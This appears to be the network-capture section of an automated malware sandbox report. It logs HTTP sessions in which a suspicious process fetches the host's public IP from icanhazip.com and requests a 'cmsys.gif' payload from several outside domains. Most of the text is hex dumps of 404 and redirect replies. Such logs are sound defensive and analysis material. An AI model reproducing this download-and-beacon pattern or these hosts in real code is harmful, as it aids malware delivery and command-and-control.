6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:11:10.766590118 CEST9230INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.44978951.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.44979851.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  5192.168.2.44980551.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  6192.168.2.44981051.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  7192.168.2.449753104.18.114.9780C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:15.496514082 CEST924OUTGET / HTTP/1.1
                                                                                  Host: icanhazip.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:15.521750927 CEST924INHTTP/1.1 200 OK
                                                                                  Date: Fri, 05 Aug 2022 07:09:15 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 14
                                                                                  Connection: keep-alive
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: GET
                                                                                  Set-Cookie: __cf_bm=arDwI3mggsXldWCcpH0AVRR.9iIZ82B.5F5bdtJi3eY-1659683355-0-AVB0owPg7Q/jud4+qBksqRXyPGsYBAVdtbK0ieU8WT0cB002n9hCHuXLiUxtbnbjs5gx931uaIu4vOSzuEr75Aw=; path=/; expires=Fri, 05-Aug-22 07:39:15 GMT; domain=.icanhazip.com; HttpOnly
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 735db4cbeb5b9968-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 0a
                                                                                  Data Ascii: 102.129.143.3


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  8192.168.2.449760142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:28.219057083 CEST1146OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:28.246371984 CEST1148INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:28 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:28.246386051 CEST1148INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  9192.168.2.449761142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:09:30.905103922 CEST1149OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:30.932235003 CEST1151INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:30 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:30.932254076 CEST1151INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.44976651.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2022-08-05 07:09:40 UTC0OUTGET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:09:40 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                  x-litespeed-cache: hit
                                                                                  content-length: 0
                                                                                  date: Fri, 05 Aug 2022 07:09:40 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.44976951.81.194.202443C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2022-08-05 07:09:41 UTC0OUTGET /what-happened-to-the-old-zxq-website/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Connection: Keep-Alive
                                                                                  Host: zxq.net
                                                                                  2022-08-05 07:09:41 UTC0INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                  link: <https://zxq.net/wp-json/wp/v2/pages/187>; rel="alternate"; type="application/json"
                                                                                  link: <https://zxq.net/?p=187>; rel=shortlink
                                                                                  etag: "5981-1659425030;;;"
                                                                                  x-litespeed-cache: hit
                                                                                  transfer-encoding: chunked
                                                                                  date: Fri, 05 Aug 2022 07:09:41 GMT
                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                  2022-08-05 07:09:41 UTC1INData Raw: 64 62 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 73 2d 64 61 72 6b 20 73 69 74 65 2d 73 2d 64 61 72 6b 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61 78 2d 73 6e 69 70 70
                                                                                  Data Ascii: dbde<!DOCTYPE html><html lang="en-US" class="s-dark site-s-dark"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='index, follow, max-image-preview:large, max-snipp
                                                                                  2022-08-05 07:09:41 UTC2INData Raw: 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 68 61 74 20 68 61 70 70 65 6e 65 64 20 74 6f 20 74 68 65 20 6f 6c 64 20 5a 58 51 20 77 65 62 73 69 74 65 3f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 46 6f 72 20 5a 58 51 2e 6e 65 74 20 53 75 62 64 6f 6d 61 69 6e 20 4f 77 6e 65 72 73 20 54 68 65 20 6f 6c 64 20 5a 58 51 20 77 65 62 73 69 74 65 20 68 61 64 20 62 65 65 6e 20 73 68 75 74 20 64 6f 77 6e 20 62 79 20 74 68 65 20 70 72 65 76 69 6f 75 73 20 6f 77 6e 65 72 73 2e 20 50 72
